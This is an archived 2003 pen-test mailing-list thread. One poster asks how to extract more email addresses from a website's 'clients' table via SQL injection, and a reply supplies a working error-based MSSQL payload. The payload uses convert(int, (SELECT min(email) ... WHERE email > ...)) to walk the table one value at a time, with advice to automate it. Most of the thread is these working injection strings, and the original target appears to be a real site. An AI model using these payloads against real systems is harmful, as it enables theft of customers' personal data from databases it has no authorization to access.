RE: SQL injection - get more values

From: Brass, Phil (ISS Atlanta) (PBrassat_private)
Date: Wed Feb 12 2003 - 11:05:02 PST

Next message: Steven M. Christey: "Re: Vulnebrability level definition"

Previous message: Thaidn: "Re: SQL injection - get more values"
Maybe in reply to: Daniel Savi: "SQL injection - get more values"
Next in thread: Kevin Spett: "Re: SQL injection - get more values"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I believe the solution you're looking for is the old min-where-order-by
trick.

> ' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b
'

Try this:
> ' %2b convert(int, (SELECT min(email) FROM clients WHERE email > 'a'
order by 1)) %2b '

After you get the first value (say it's anonat_private), you throw it into
the where clause:

> ' %2b convert(int, (SELECT min(email) FROM clients WHERE email >
'anonat_private' order by 1)) %2b '

You get the next value, say it's axonat_private, then you do the next
query:

> ' %2b convert(int, (SELECT min(email) FROM clients WHERE email >
'axonat_private' order by 1)) %2b '

And so on, until you don't get an error.  Of course, for most gratifying
results you write a little program that does this for you.

Phil


> -----Original Message-----
> From: Daniel Savi [mailto:dssat_private] 
> Sent: Wednesday, February 12, 2003 12:49 PM
> To: pen-testat_private
> Subject: SQL injection - get more values
> 
> 
> 
> 
> Hi :)
> 
> i'm trying to get some info from clients table and email field....
> 
> i try this param into gubpage.asp?=...
> ') union select sum(email) from clients--
> and got error about all queries needed...so, i tryed to solve with
> ') union select sum(email),1,1,1.... from clients--
> until i get: operand type clash: text is incompatible with int 
> 
> i found this answer into this forum (thanks :)), was:
> ' %2b convert(int, (SELECT email FROM clients WHERE email > 
> 'a')) %2b '
> 
> i got this: 
> Syntax error converting the varchar value 'anonat_private' to a 
> column of 
> data type int
> 
> Now, my problem: How can i get other e-mail from table 
> knowing one valid 
> value?
> 
> i try this
> ' %2b convert(int, (SELECT email FROM clients WHERE email 
> > 'anonat_private')) %2b '
> but no success
> 
> i think i can use NOT iN, but not sure how to use with convert...
> 
> Any tip are welcome!
> 
> Thanks
> 
> --------------------------------------------------------------
> --------------
> This list is provided by the SecurityFocus Security 
> Intelligence Alert (SIA) Service. For more information on 
> SecurityFocus' SIA service which automatically alerts you to 
> the latest security vulnerabilities please see: 
https://alerts.securityfocus.com/


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Next message: Steven M. Christey: "Re: Vulnebrability level definition"
Previous message: Thaidn: "Re: SQL injection - get more values"
Maybe in reply to: Daniel Savi: "SQL injection - get more values"
Next in thread: Kevin Spett: "Re: SQL injection - get more values"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Feb 12 2003 - 13:27:01 PST